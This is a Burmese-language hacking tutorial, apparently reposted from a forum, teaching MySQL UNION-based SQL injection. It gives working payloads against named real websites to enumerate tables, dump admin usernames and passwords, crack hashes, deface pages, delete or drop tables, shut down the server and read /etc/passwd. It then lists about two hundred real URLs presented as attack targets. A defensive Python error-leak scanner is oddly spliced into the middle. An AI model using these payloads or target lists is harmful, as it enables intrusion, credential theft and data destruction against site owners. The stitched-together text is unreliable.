www.site.com/article.php?id=5 order by 3/*
အခ 3 ကေရာကးတ႔အခါ အမြာေတျ႔တယးဆရငး ဒါဆရငး ကၽျနးေတားတ႔ Columns ႏြစးခရြတယးဆတာ
သသျာပါၿပ... ဒလနညးန႔ Column ေတျက တစးဆငးၿခငးရြာေဖျရပါတယး...
ေနာကးတစးခ ပန႔ တကျ ရြာေဖျၾကညးရေအာငး
http://sbisa.org/circle.php?id=26
ကၾကညးမယး..
http://sbisa.org/circle.php?id=26
ရ႕ value ေနာကးမြာ ' ဆတ႔ (apostrophe) တစးခထညးလကးပါမယး..
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/home/sbisaor/public_html/circle.php on line 10 ဆတ႔ error
တစးခေတျ႔ပါလမးမယး..
ဒါဆရငးေသခာတယး.. SQL error တစးခတကးေနၿပ... တတကကေၿပာရရငး DB Server က MySQL
OK, ဒါဆရငး ကၽျနးေတားတ႔ Columns အေရအတျကးရြာမယး...
http://sbisa.org/circle.php?id=-26 order by 1,2,3,4,5,6-- ဒအထအဆငးအဆငးရြာတယး... error
မၿဖစးေသဘ
7 အထေရာကးတ႔အခါမြာေတာ error ေတျ႔တယးဆရငး ဒါဟာ 6 Columns ရြတယး...
ဒါဆရငးေနာကးထပး UNION SELECT ALL ဆတ႔ statement တစးခကသမယး..
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,4,5,6-- ဆၿပရကးထညးလကးမယး..
ဒါဆရငး 2,3,4 ဆတာၿပမယး.. ဒအပငးေတျက data ေတျသမးဆညးထာတ႔ Columns ေတျၿဖစးတယး...
---Finding the MySQL version---
ဒ Injection မြာ MySQL Version က checking လပးဖ႔လပါတယး... . Version အာ Checking လပးရနး
@@version သ႔မဟတး version() functions ေတျကသေပရပါမယး.. အခ @@version က
data ေတျသမးဆညးထာတ႔ column မြာထညးၿပ MySQL version ကစစးမယး..
http://sbisa.org/circle.php?id=-26 union select all 1,@@version,3,4,5,6--
သ႔မဟတး
http://sbisa.org/circle.php?id=-26 union select all 1,version(),3,4,5,6--
ကသႏငးပါတယး.. တခါတစးေလမြာ အထကးပါနညးအတငးက error ေတျၿဖစးတတးတ႔အတျကး unhex(hex())
ကသေပရပါမယး..
http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex(@@version)),3,4,5,6--
ဒါဆရငး Server မြာ အသၿပေနတ႔ MySQL ရ႕ version ကေဖားၿပေပသျာပါလမးမယး...
အကယး၍ user တ႔ ၊ database တ႔က check ခငးတယးဆရငး ေအာကးပါတငး checking
လပးႏငးပါတယး..
www.site.com/article.php?id=5 UNION ALL SELECT
user(),2/*
www.site.com/article.php?id=5 UNION ALL SELECT
database(),2/*
ဥပမာ :- http://sbisa.org/circle.php?id=-26 union select all 1,version(),database(),user(),5,6--
---Injection on MySQL 5 and above---
အခကၽျနးေတားတ႔ ရတာ MySQL version 5.0.90 ၿဖစးပါတယး... MySQL version 5 မြာ
information_schema ဆတ႔ အသငးတ႔ funtion တစးခပါငးၿပ ၄ငးက လကးရြ DB server ရ႕ tables န႔
columns ေတျက ထနးသမးထာတာၿဖစးပါတယး...
Tables ေတျကရယရနး table_name from information_schema.tables ဆတာကသသလ
Columns ေတျကရယရနး column_name from information_schema.columns
ဆတာကသရပါမယး..
ေနာကးတစးခကေတာ ဒ site အေပၚမြာ ၿမငးရေအာငးလ႔
group_concat(table_name) က Tables ေတျအတျကးန႔
group_concat(column_name)က Columns ေတျအတျကးသေပရပါတယး...
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(table_name),5,6 from
information_schema.tables where table_schema=database()--
ေစာေစာက ကၽျနးေတားတ႔ MySQL version က @@version အစာ unhex(hex()) န႔သခ႔ရတယးဆရငး အခ
Table န႔ Column ကရြာတ႔အခါမြာလညး အ႔လပ သေပရပါတယး။
http://sbisa.org/circle.php?id=-26 union select all
1,unhex(hex()),3,group_concat(table_name),5,6 from information_schema.tables where
table_schema=database()--
ေနာကးထကးတစးခါ ကၽျနးေတားတ႔ Columns ေတျကၾကညးမယးဆရငး
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(column_name),5,6 from
information_schema.columns where table_schema=database()--
ဒါဆရငး DB ထက table ေတျက ေဖားၿပေပပါၿပ... အခ ကၽျနးေတားတ႔ဒ tables ေလေတျက စနစးတက
မြတးသာထာပါမယး... ေနာကးတစးဆငးတကးကာ ကၽျနးေတားတ႔လခငးတ႔ user name န႔ password ေတျ
သမးထာတ႔ table ကၾကညးပါမယး...
group_concat ကပ ဆကးလကးသပါမယး.. ဒါေပမ႔ ကၽျနးေတားတ႔ လခငးတ႔ username,
password ေတျသမးထာေလာကးတ႔ columns ေတျထက စစးထတးယမြာပါ။ ဒေနရာမြာ ကၽျနးေတားတ႔
မြနးထာတ႔ table အမညးက from information_schema.tables
where table_schema=database-- ေနရာမြာ ထညးသျငးမြာၿဖစးပါတယး..
0x3a ဆတာကေတာ ":" ရ႕ hex code ပါ။
http://sbisa.org/circle.php?id=-26 union select all
1,2,3,group_concat(username,0x3a,password),5,6 from
admin--
ဒါဆရငးေတာ မမတ႔လခငးတ႔ username န႔ password ကရသျာပါၿပ... ရရြထာတ႔
password ဟာ plaintext ၿဖစးတယးဆရငးေတာ ထပးၿပေခါငးရႈပးစရာမလေတာဘေပါ႔
တစးခ႕ကေတာ password hashed လပးထာတ႔ အတျကး ၄ငးတ႔အာ hash cracker ေတျန႔
ေၿဖထတးေပရပါလမးမယး..
ဥပမာ
admin:3a39ec8cd0c399cc247936ad5e0b6927
John The Ripper
www.openwalls.org
Cain & Abel
www.oxid.it
hash လပးထာတ႔ password ေတျသာဆရငးေတာ အနညးငယးခကးသျာပါလမးမယး... အထကးပါ hash က
crack လပးလကးရငး adminlanetCreator ဆၿပရပါမယး..
က ဒါဆရငးေတာ admin န႔ password ကရၿပဆရငး ကယးလပးခငးသလလပးေပေတာ..
---MySQL version 4 injection---
MySQL version က 4 ၿဖစးမယးဆရငး version 5 လ information_schema.tables and
information_schema.columns က support မလပးတ႔အတျကး table name န႔ column name ေတျက
guess လပးရပါတယး... ေနာကးတစးခက error message အေပၚမြာအေၿခခၿပခနး႔မြနးရတာပါ။ The error
reports pnc_article in the error ဆရငး pnc ဆတ႔ prefix ကသထာတ႔အတျကး table name က pnc
ဆတာ ခနး႔မြနးလ႔ရႏငးပါတယး။
ဥပမာ ကၽျနးေတားက table name က user ဆၿပ ခနး႔မြနးလကးမယး.. ဒါဆရငး
ေအာကးပါအတငးရကးထညးေပၾကညးမယးဆပါစ႔
www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM user/*
အထကးပါအတငးရကးထညးလကးလ႔ error ၿဖစးေနတယးဆရငး ဒါဟာ table မရြလပ... ေနာကးတစးခါထပးၿပ
guess လကးပါ... table name က tbluser ဆၿပထာလကးပါမယး..
www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM tbluser/*
ဒလနညးန႔ table name ေတျ column ေတျအာ ခနး႔မြနးၿပထညးသျာရပါလမးမယး...
www.site.com/article.php?id=5 UNION ALL SELECT user_name,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT username,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT pass,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT password,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM
tbluser/*
ေနာကးဆ username န႔ password က ရတ႔အထေပါ႔...
Table name အခ႕ပါ : user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc.
ဒါဟာ Injection ရ႕ လ႕ ြကးထာတ႔ Data မာက ရယတ႔အပငးၿဖစးပါတယး... Admin ရ႕ username &
password ရၿပဆရငး Admin Login Page မြာရကးထညးရပါမယး... Joomla ဆရငး /administrator န႔
Wordpress ဆရငး /wp-admin ၿဖစးပါတယး.. အခ႕ site ေတျက admin panel ကရြာရခကး ေနပါလမးမယး..
ဒါဆရငး admin panel finder ေလေတျကသၿပရြာေဖျရပါလမးမယး...
Admin Panel Finder
http://www.planetcreator.net/planetc...inpanelfinder/
န႔ရြာႏငးပါတယး။
---Modifying the Site---
အခ႕ေသာ Site ေတျက admin ရ႕ password ကရေပမ႔ admin panel ကရဖ႔ခကးခၿခငး၊ ရြာမေတျ႔ၿခငးေတျန႔
ၾကရတတးပါတယး... ဒလေနရာမြာ SQL commands ေတျကသၿပ အထက site ရ႕ contents
ေတျကၿပငးဆငးေၿပသျာရမြာၿဖစးပါတယး...
ဒါေလေတျက အေရပါတ႔ command ေလေတျပါ
UPDATE:It is used to edit infos already in the db without deleting any rows.
DELETE:It is used to delete the contents of one or more fields.
DROP: It is used completely delete a table & all its associated data.
UPDATE:-
www.site.com/article.php?id=5
ဆၾကပါစ႔ကၽျနးေတားတ႔ရ႕ query က ေအာကးပါအတငးၿဖစးမယးဆရငး
SELECT title,data,author FROM article WHERE id=5
(table name န႔ column ေတျက အထကးပါအတငးရြာေဖျက ထညးေပရတာၿဖစးပါတယး) ေအာကးပါအတငး
site ကၿပငးေပသျာပါမယး...
www.site.com/article.php?id=5 UPDATE article SET title='Hacked By SomeOn3'/*
ခကးဆနးဆနးေလ ထကးၿပ အရစးတကးလကးမယးဆရငး
www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY
SomeOn3',data='Welcome to My Planet',author='SomeOn3'/*
သတးမြတးထာတ႔ page ေၿပာငးလၿပ update လပးခငးတယးဆရငးေတာ ေအာကးပါအတငး
ရကးထညးေပရပါတယး..
www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value
3' WHERE id=5/*
DELETE:- DB Server ထကေန အၿမတမးဖကးပစးေတာမယးဆရငး DELETE command ကသသျာပါမယး..
www.site.com/article.php?id=5 DELETE title,data,author FROM article/*
သတးမြတးထာတ႔ page က delete လပးခငးတယးဆရငး ေအာကးပါ table name ရ႕ ေနာကးထမြ WHERE န႔
page id ကထညးသျငးသျာရပါမယး...
www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*
ဒတစးခကေတာ DROP TABLE ပါ... Table အလကး ဖကးခငးတယး ဆရငးေတာ DROP Table န႔
table name ကဆၿပသပါမယး...
www.site.com/article.php?id=5 DROP TABLE article/*
ဒအတငးဖကးရငး table ေတျေကာ အထမြာပါတ႔ contents ေတျေကာ အာလ ပကးသျာပါလမးမယး...
SHUTTING DOWN MySQL SERVER:
www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT;
LOADFILE:
Server အထက .htaccess, .htpasswd ေတျန႔ password files ေတျၿဖစးတ႔ etc/passwd စသညး
ဖငးေတျက ယခငးတယးဆရငးေတာ LOADFILE ကသရပါတယး... ဒါကအသေတာနညးပါတယး....
www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/*
အကယး၍ hex ေတျန႔ဆရငးေတာ ေအာကးပါတငး သပါမယး..
www.site.com/article.php?id=5 UNION ALL SELECT
load_file(0x272F6574632F70617373776427)
ဒါက Hex based SQL Injection လ႔လညးေခၚႏငးပါတယး..
* SELECT
LOAD_FILE(0x633A5C626F6F742E696E69)
ဒါဟာ server ရ႕ c:\boot.ini က
ဆျယေပပါလမးမယး..
---MySQL ROOT---
MySQL
version 5 န႔အထကးမြာ mysql.user ဆတ႔ table တစးခဟာ MySQL servers
ေတျမြာရြပါတယး... အထမြာ hash လပးထာတ႔ Password န႔ username ေတျပါ ငးပါတယး... ၄ငးအထက
hash ဟာ mysqlsha1 ၿဖစးတ႔အတျကး John The Ripper န႔ crack လပးဖ႔ခကးပါမယး..
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from
mysql.user/*
ဒအတျကး InsidePro Password Recovery Software ကသလ႔ရပါတယး..
http://www.insidepro.com
---Some useful MySQL commands..---
ABORT — abort the current transaction
ALTER DATABASE — change a database
ALTER GROUP — add users to a group or remove users from a group
ALTER TABLE — change the definition of a table
ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account
ANALYZE — collect statistics about a database
BEGIN — start a transaction block
CHECKPOINT — force a transaction log checkpoint
CLOSE — close a cursor
CLUSTER — cluster a table according to an index
COMMENT — define or change the comment of an object
COMMIT — commit the current transaction
COPY — copy data between files and tables
CREATE AGGREGATE — define a new aggregate function
CREATE CAST — define a user-defined cast
CREATE CONSTRAINT TRIGGER — define a new constraint trigger
CREATE CONVERSION — define a user-defined conversion
CREATE DATABASE — create a new database
CREATE DOMAIN — define a new domain
CREATE FUNCTION — define a new function
CREATE GROUP — define a new user group
CREATE INDEX — define a new index
CREATE LANGUAGE — define a new procedural language
CREATE OPERATOR — define a new operator
CREATE OPERATOR CLASS — define a new operator class for indexes
CREATE RULE — define a new rewrite rule
CREATE SCHEMA — define a new schema
CREATE SEQUENCE — define a new sequence generator
CREATE TABLE — define a new table
CREATE TABLE AS — create a new table from the results of a query
CREATE TRIGGER — define a new trigger
CREATE TYPE — define a new data type
CREATE USER — define a new database user account
CREATE VIEW — define a new view
DEALLOCATE — remove a prepared query
DECLARE — define a cursor
DELETE — delete rows of a table
DROP AGGREGATE — remove a user-defined aggregate function
DROP CAST — remove a user-defined cast
DROP CONVERSION — remove a user-defined conversion
DROP DATABASE — remove a database
DROP DOMAIN — remove a user-defined domain
DROP FUNCTION — remove a user-defined function
DROP GROUP — remove a user group
DROP INDEX — remove an index
DROP LANGUAGE — remove a user-defined procedural language
DROP OPERATOR — remove a user-defined operator
DROP OPERATOR CLASS — remove a user-defined operator class
DROP RULE — remove a rewrite rule
DROP SCHEMA — remove a schema
DROP SEQUENCE — remove a sequence
DROP TABLE — remove a table
DROP TRIGGER — remove a trigger
DROP TYPE — remove a user-defined data type
DROP USER — remove a database user account
DROP VIEW — remove a view
END — commit the current transaction
EXECUTE — execute a prepared query
EXPLAIN — show the execution plan of a statement
FETCH — retrieve rows from a table using a cursor
GRANT — define access privileges
INSERT — create new rows in a table
LISTEN — listen for a notification
LOAD — load or reload a shared library file
LOCK — explicitly lock a table
MOVE — position a cursor on a specified row of a table
NOTIFY — generate a notification
PREPARE — create a prepared query
REINDEX — rebuild corrupted indexes
RESET — restore the value of a run-time parameter to a default value
REVOKE — remove access privileges
ROLLBACK — abort the current transaction
SELECT — retrieve rows from a table or view
SELECT INTO — create a new table from the results of a query
SET — change a run-time parameter
SET CONSTRAINTS — set the constraint mode of the current transaction
SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier of the current session
SET TRANSACTION — set the characteristics of the current transaction
SHOW — show the value of a run-time parameter
START TRANSACTION — start a transaction block
TRUNCATE — empty a table
UNLISTEN — stop listening for a notification
UPDATE — update rows of a table
VACUUM — garbage-collect and optionally analyze a database
SQL
Injection မြာ အသၿပတ႔ အေၿခခေတျပ ရြပါေသတယး... ဒထကးမာတ႔ functions ေတျအမာၾကရြသလ
ဒထကးပၿပနကးနတ႔ အသၿပပေတျရြပါတယး... ေလလာတ႔သေတျအေနန႔ မမတ႔ကယးတငး SQL commands
ေတျက အရငးဆ ကယးတငးစမးစစးၿပ မမတ႔ရ႕ SQL commands အသၿပမႈအရညးအခငးက
ၿမငးတငးသငးပါတယး။
-----------------------------------------------------------------------------------------------------------------
With this much, I think you will have understood the concepts of SQL Injection.
Note - The SQL Injection text above was copied directly from Ko BrB (planet creator).
How to find websites that show SQL errors
Sites that have an SQL vulnerability (Vuln) can be found with Google Dorks. A Dork is, you could say, a keyword search string that gathers exactly the results we need together in one place. I have collected a lot of Dorks below. Once you have searched and found a site that shows an SQL error, you can take it as the Target and Attack it using Ko BrB's method or any other method.
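A defender-side check for the exposure described above, added here and not part of the original text: it scans pages saved from a crawl of your own site for database error output, which is the text a search engine indexes when a page is found as an "SQL error" site. The sample URLs, page bodies and all function names are constructed for this example.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl

# Fragments that PHP and MySQL write into a page when a query fails and
# errors are displayed to the visitor (list chosen for this example).
ERROR_SIGNATURES = [
    re.compile(r"Warning:\s+(?:mysqli?|pg)_\w+\(\)", re.I),
    re.compile(r"You have an error in your SQL syntax", re.I),
]

# PHP warnings end with "in <script path> on line <n>", which also
# discloses the server-side file layout.
PATH_LEAK = re.compile(r"\bin (\S+\.php\d?) on line (\d+)")


def visible_text(body):
    """Reduce an HTML body to the text a crawler would index."""
    text = re.sub(r"(?is)<(script|style)\b.*?</\1>", " ", body)
    text = re.sub(r"<[^>]+>", "", text)      # PHP wraps warnings in <b> tags
    text = html.unescape(text)               # &#039; -> ' and so on
    return re.sub(r"\s+", " ", text)


def query_params(url):
    """Names of the query parameters on the page URL, in order."""
    return [k for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)]


def audit(pages):
    """Return one finding per page whose visible text leaks a database error."""
    findings = []
    for url, body in pages:
        text = visible_text(body)
        errors = [m.group(0) for sig in ERROR_SIGNATURES
                  for m in [sig.search(text)] if m]
        if not errors:
            continue
        leak = PATH_LEAK.search(text)
        findings.append({
            "url": url,
            "params": query_params(url),
            "errors": errors,
            "source_path": leak.group(1) if leak else None,
            "line": int(leak.group(2)) if leak else None,
        })
    return findings


# Constructed sample: (URL, response body) pairs from a crawl of your own site.
SAMPLE_PAGES = [
    ("https://shop.example.test/product.php?id=12",
     "<html><body><h1>Blue mug</h1><p>In stock</p></body></html>"),
    ("https://shop.example.test/news.php?id=7",
     "<html><body><br />\n<b>Warning</b>:  mysql_fetch_array() expects "
     "parameter 1 to be resource, boolean given in "
     "<b>/var/www/shop/news.php</b> on line <b>42</b><br /></body></html>"),
    ("https://shop.example.test/search.php?q=mug&page=2",
     '<div class="results">You have an error in your SQL syntax; check the '
     "manual that corresponds to your MySQL server version for the right "
     "syntax to use near &#039;\\&#039;&#039; at line 1</div>"),
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_PAGES):
        where = finding["source_path"] or "no path disclosed"
        print(finding["url"], finding["errors"], where)
```

Any finding means the error is being rendered to visitors; setting `display_errors = Off` and `log_errors = On` in php.ini removes the indexed text, and the failing query itself still needs to be rewritten as a parameterized statement.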
Collection of Google Dorks for SQL Injection
by 3thic0kiddi3
From the Dorks above, you can search with whichever Dork suits you and test.
Collection of websites that have an SQL Error (Vuln)
http://www.eia.org.uk/view.php?id=948'
http://www.rockthewok.com/readnews.php?id=24'
http://www.sghgate.net/productinfo.php?id=627'
http://mikesmit.com/show_post.php?id=1175207880'
http://www.djinsure.com/faq/viewFAQ.php?id=13'
http://www.fspacerpg.com/proddetail.php?ID=FSPEB103'
http://www.narkissosshavingoil.com/product/item.php?ID=1'
http://www.oiwsba.com/oiwsba/memberinfo.php?id=54'
http://www.bayareaassn.com/memberinfo.php?id=7'
http://association.cqu.edu.au/cqusa_faq/php/view-faq.php?id=101'
http://staff-driver.net/page.php?file=vacansys&vacstart=10'
http://www.bengaldens.com/detail_all_post.php?id=78'
http://www.niesr.ac.uk/staff/staffdetail.php?StaffID=321'
http://www.suagacollection.com/photo-gallery.php?id=1'
http://www.srilankatravelcentre.com/pages.php?id=49'
http://www.sedicifilm.it/games.php?id_cat3=55'
http://www.motorxchange.fr/destockages.php?id_destockage=123'
http://www.gocontempo.com/pages.php?id=2'
http://inrecs.com/releases.php?id=1'
http://www.nsche.org.ng/communiquedetail.php?ID=2'
http://www.aquasignal.info/us/cms/htdocs/main.php?id=209'
http://www.discoverypartnerships.com/register/curriculum.php?id=44'
http://www.ghnats.org/pages.php?id=2'
http://www.worldmusicinstitute.org/event.php?id=906'
http://wminyc.org/event.php?id=1072'
http://www.arcana.com/view_title.php?id=189'
http://spokesrecords.com/releases.php?id=2'
http://www.canalchat.com/transcript.php?id_alaffiche=1013'
http://www.canalchat.com/transcript.php?id_alaffiche=783'
http://cloneemotorcentre.ie/faq2.php?id=15'
http://komagan.net/readnews.php?id=5'
http://fpchurch.org.uk/News/view.php?id=26'
http://sflcn.com/story.php?id=9826'
http://www.oldtimephotos.org/gallery.php?id=11'
http://www.latintourdimensions.com/overview/product_detail.php?id=352'
http://www.latintourdimensions.com/overview/product_detail.php?id=86'
http://www.seanscottphotography.com.au/shop_category.php?id=1'
http://mappn.com/game.php?id=3'
http://www.geneticsandsociety.org/article.php?id=129'
http://www.uslandandhome.com/detail.php?id=2649'
http://www.ndc.ps/main.php?id=9'
http://www.falltvpreview.com/show.php?id=1037'
http://www.timeref.com/myperson.php?id=1752'
http://www.trumanlibrary.org/photographs/view.php?id=392'
http://perkins.pvt.k12.ma.us/museum/section.php?id=213'
http://ohr.edu/ask_db/ask_main.php?id_number=222'
http://www.torinofilmlab.it/person.php?id=344'
http://www.torinofilmlab.it/person.php?id=338'
http://ce.et.tudelft.nl/person.php?id=926'
http://www.natalpress.com.br/humor.php?id=7775'
http://www.driftsurfing.eu/surf_article.php?id=1880'
http://www.emaxxtech.com/view_faq.php?id=34'
http://www.hotproperties-bayarea.com/readnews.php?id=11'
http://www.stonemarket.co.uk/section.php?id=3'
http://www.micronanosystems.co.uk/nano_news_full.php?id=72544'
http://www.brock.ac.uk/news/news/detail.php?id=000178'
http://www.brock.ac.uk/news/news/detail.php?id=000189'
http://www.thedockyard.co.uk/photo_gallery_pop.php?id=43'
http://www.inner-live.com/index.php?task=channels&action=view&channel_id=339'
http://www.drinksontario.com/memberinfo.php?id=70'
http://www.hebron.com/english/gallery.php?id=170'
http://www.evene.fr/forum/theme.php?id_theme=19'
http://hoohila.stanford.edu/firingline/displayTranscript.php?programID=418'
http://www.irishart.com/dispgallery.php?id=518'
http://linkinthebox.com/productinfo.php?id=109'
http://www.wall4me.com/uk/page_produit.php?id=16'
http://www.carhs.de/en/company/news/full.php?Id=202'
http://www.austells.net/news/news_full.php?id=30'
http://www.humormillnews.com/hmill/read.php?id=13'
http://lemhiweb.com/news.php?id=36'
http://www.shirtsenletters.nl/nav/artikel_info.php?id=631'
http://www.boys.njpanthers.com/preview.php?id=24'
http://www.fasl.ch/activites/tous_annonces_ages.php?idcentre'
http://en.swfplay.net/game.php?id=104'
http://www.gp.org/speakers/detail.php?ID=29'
http://www.polkatheatre.com/event.php?id=43'
http://brml.technion.ac.il/publications.php?id=7'
http://www.gordonsmithguitars.co.uk/products/category.php?id=2'
http://www.18eighty.com/os_view_product.php?id=37'
http://www.octaviahousing.org.uk/about-us/news/view.php?Id=233'
http://www.tecnologi.net/wp/curriculum.php?id=237'
http://www.worldstyling.com/web/product_detail.php?id=95'
http://cherokeeguitar.com/product-detail.php?id=16'
http://www.westcliffepublishers.com/detail.php?id=345'
http://www.justcampagne.fr/en/produit.php?id_cat=5'
http://www.glac.fr/en/produit.php?id=76'
http://www.theshootinggamepage.com/displaygames.php?id=32'
http://www.skbcases.com/music/news/news-detail.php?id=82'
http://bryanco.com/news_post.php?id=26'
http://weekend.od.ua/news_full.php?id=1531'
http://www.kusuri.co.uk/view_product.php?id=245'
http://www.kusuri.co.uk/view_product.php?id=242'
http://www.charot.com/produit.php?id=20'
http://www.nicolasmarquis.com/site/produit.php?id=%2733'
http://www.indianewsheadlines.com/post.php?id=8006'
http://www.dentistry.co.uk/news/news_detail.php?id=2292'
http://www.dentistry.co.uk/news/news_detail.php?id=1330'
http://www.manka-creations.com/AG/produit.php?ID_produits=4'
http://www.carldavey.co.uk/product.php?id=2'
http://www.actipack.fr/actipack/lang_EN/fiche_produit.php?id=180'
http://www.walkamilepeterborough.com/participant.php?id=95'
http://www.gielighting.com/ang/_produit.php?id_cat=7'
http://www.manka-creations.com/AG/produit.php?ID_produits=28'
http://www.clicfolio.com/clicfolio/curriculum.php?id=5079'
http://www.wardrobesystems.co.uk/preview.php?id=365'
http://www.planetbollywood.com/displayArticle.php?id=s011911120004'
http://www.peabody.uga.edu/news/event.php?id=59'
http://snakedancecondos.com/pages.php?id=10'
http://www.zoolyshop.com/productinfo.php?id=201'
http://mx5.brighton-rock.net/BandInfo.php?ID=315'
http://mx5.brighton-rock.net/BandInfo.php?ID=643'
http://www.skbcases.com/industrial/products/prod-detail.php?id=235'
http://elmercadohispano.com/prod_detail.php?ID=284" onclick="sa_mpTC(event, this); return
false;'
http://bulacandeped.org/viewannounce.php?id=4'
http://www.retroinferno.com/viewproduct.php?id=235'
http://core.materials.ac.uk/search/detail.php?id=1300'
http://www.clickautographs.com/detail.php?id=1611'
http://brml.technion.ac.il/publications.php?id=6'
http://dufieux-industrie.com/en/fiche_type_produit.php?id=15'
http://www.lindbergbros.com/page/post.php?id=365'
http://www.mvsport-tuning.com/viewProduct.php?id=23'
http://bryanco.com/news_post.php?id=23'
http://www.kevinmurphy.com.au/products/styling_productdetail.php?id=17'
http://www.pioneer-group.co.uk/event.php?id=17'
http://ohr.edu/ask_db/ask_main.php?id_number=1310'
http://www.amoryssolicitors.com/main.php?ID=1'
http://boxofficebuz.com/news_full.php?id=36'
http://leavenworth.org/modules/pages/index.php?pageid=1'
http://www.armorysquareofsyracuse.com/main/shopping.php?id=14'
http://www.greenkettle.co.uk/view.php?id=%277'
http://www.discoverypartnerships.com/register/curriculum.php?id=49'
http://www.feicuidao.com/jqzx_look.php?id=26'
http://www.merseyfencing.co.uk/section.php?id=Timber-Fence-Panels'
http://www.tanthrough.com/proddetail.php?id=809790'
http://www.inhealthnw.com/story.php?id=143'
http://www.saleemcarpets.com/prod_detail.php?ID=10'
http://kornerstore.net/ks_proddetail.php?ID=180'
http://www.widescreenreview.com/news_detail.php?id=19267'
http://dpanswers.com/roztr/content_show.php?id=86'
http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=71'
http://www.hypetrading.com/productinfo.php?id=491'
http://www.mikesmit.com/show_post.php?id=1141826580'
http://www.charot.com/produit.php?id=13'
http://www.coedllandegla.com/download.php?id=2'
http://www.cfnielsen.com/material.php?id=17'
http://ce.et.tudelft.nl/publications.php?id=1755'
http://www.mediflight.com.au/publications.php?id=75'
http://english.euyou.com/shopping.php?id=25&countryid=7'
http://rainydaymv.com/toys/games-toys-all-ages.php?id=35'
http://www.uni-saarland.de/fak3/fr36/sites/institut/person.php?id=1'
http://www.medix.com.hr/aboutbook.php?id=33'
http://www.australianewsonline.com/post.php?id=9960'
http://www.dundeetrainingstable.com/news-full.php?ID=16'
http://www.actforkids.com.au/news_full.php?id=134'
http://www.glac.fr/en/produit.php?id=45'
http://www.glac.fr/en/produit.php?id=11'
http://www.glac.fr/en/produit.php?id=51'
http://www.youngatheartministries.com/prod_detail.php?id=3'
http://www.communityinclusion.org/staff.php?staff_id=21'
http://www.flyfishinginmaine.com/story.php?id=58'
http://cherokeeguitar.com/product-detail.php?id=19'
http://www.retroinferno.com/viewproduct.php?id=700'
http://capeyouthadventures.co.za/main.php?Id=6'
http://www.sflcn.com/story.php?id=6946'
http://www.benlongfineart.com/news.php?id=8'
http://www.edwardsymmons.com/pages/news_story.php?id=171'
http://www.alte.org/news/newsitem.php?newsID=209'
http://www.iol.umd.edu/People/person.php?id=tweyrauch'
http://www.cornerstone.org.uk/publications.php?id=newsletters'
http://lucklyinthebox.com/productinfo.php?id=1155'
http://www.allnations.net/equipment/prodinfo.php?ID=283'
http://www.coastalengineering.com/staff_pop.php?id=10'
http://www.prespec-consulting.com/theme/theme.php?id_theme=8'
http://komagan.net/readnews.php?id=7'
http://www.aspasiabooks.com/News_View.php?ID=37'
http://www.newmasterplanning.com/project_main.php?id=16'
http://www.biblioteca-ua.com/select_biblio.php?id=-
1599+union+select+1%2Cconcat%28table_name%2C0x3a%2Ccolumn_name%2C0x3a%2Ctab
le_sc
hema%29%2C3%2C4%2C5+from+information_schema.columns+where+column_name+LIKE
+CHAR% 2837%2C+112%2C+97%2C+115%2C+37%29--'
http://biblioteca-ua.com/select_biblio.php?id=1599" onclick="sa_mpTC(event, this); return
false;'
http://www.dentistry.co.uk/news/news_detail.php?id=808'
http://www.dentistry.co.uk/news/news_detail.php?id=2380'
http://yoga.ge/pages/theme.php?id=192%E1%83%99%E1%83%90%E1%83%A0%E1%83%9
2%E1%83%98%E1%83%90'
http://www.lawetalnews.com/post.php?id=144'
http://www.nu.edu.bd/noticeInfo.php?id=355'
http://www.glac.fr/en/produit.php?id=66'
http://www.glac.fr/en/produit.php?id=82'
http://www.anchoryachts.com/preview.php?ID=3'
http://www.tecnologi.net/wp/curriculum.php?id=36'
https://powertraveller.com/news/detail.php?id=000296'
http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=17'
http://www.f4customs.com/install_pages.php?id=8'
http://www.luimo.org/curriculum.php?id=ST000036'
http://rainydaymv.com/toys/games-toys-all-ages.php?id=21'
http://www.thefastshow.com/virtual_show_detail.php?ID=44'
http://boxofficebuz.com/news_full.php?id=57'
http://www.amouage.com/news.php?ID=10'
http://www.yboaofnc.com/event.php?id=63'
http://www.indianewsheadlines.com/post.php?id=8049'
http://www.sinclairgroup.com/sinclair_web/person.php?id=104'
http://www.samsungmobilers.ro/post.php?id=143'
http://www.johandemeij.com/post.php?id=223'
http://www.chot.org/pages.php?id=88'
http://www.walesdirectory.co.uk/events/event.php?id=2377'
http://riyadhtravel.net/show.php?id=3'
http://iwine.com.hk/product_item.php?id=17'
http://www.dvdholocaust.com/review.php?id=473'
http://computer.ytu.edu.cn/showannounce.php?id=41'
http://www.robotech.com/community/forum/messages.php?id=24'
http://www.sinclairgroup.com/sinclair_web/person.php?id=49'
http://arthurpober.com/pages.php?id=15'
http://www.vertexlaw.co.uk/news/detail.php?id=000056'
http://allnations.net/equipment/prodinfo.php?ID=3'
http://www.allnations.net/equipment/prodinfo.php?ID=236'
http://www.towncityrealty.com/info.php?id=25'
http://www.avmaniacs.com/review.php?id=319'
http://www.watercampws.uiuc.edu/index.php?menu_item_id=44'
http://www.brighton-rock.net/BandInfo.php?ID=479'
http://www.brighton-rock.net/BandInfo.php?ID=555'
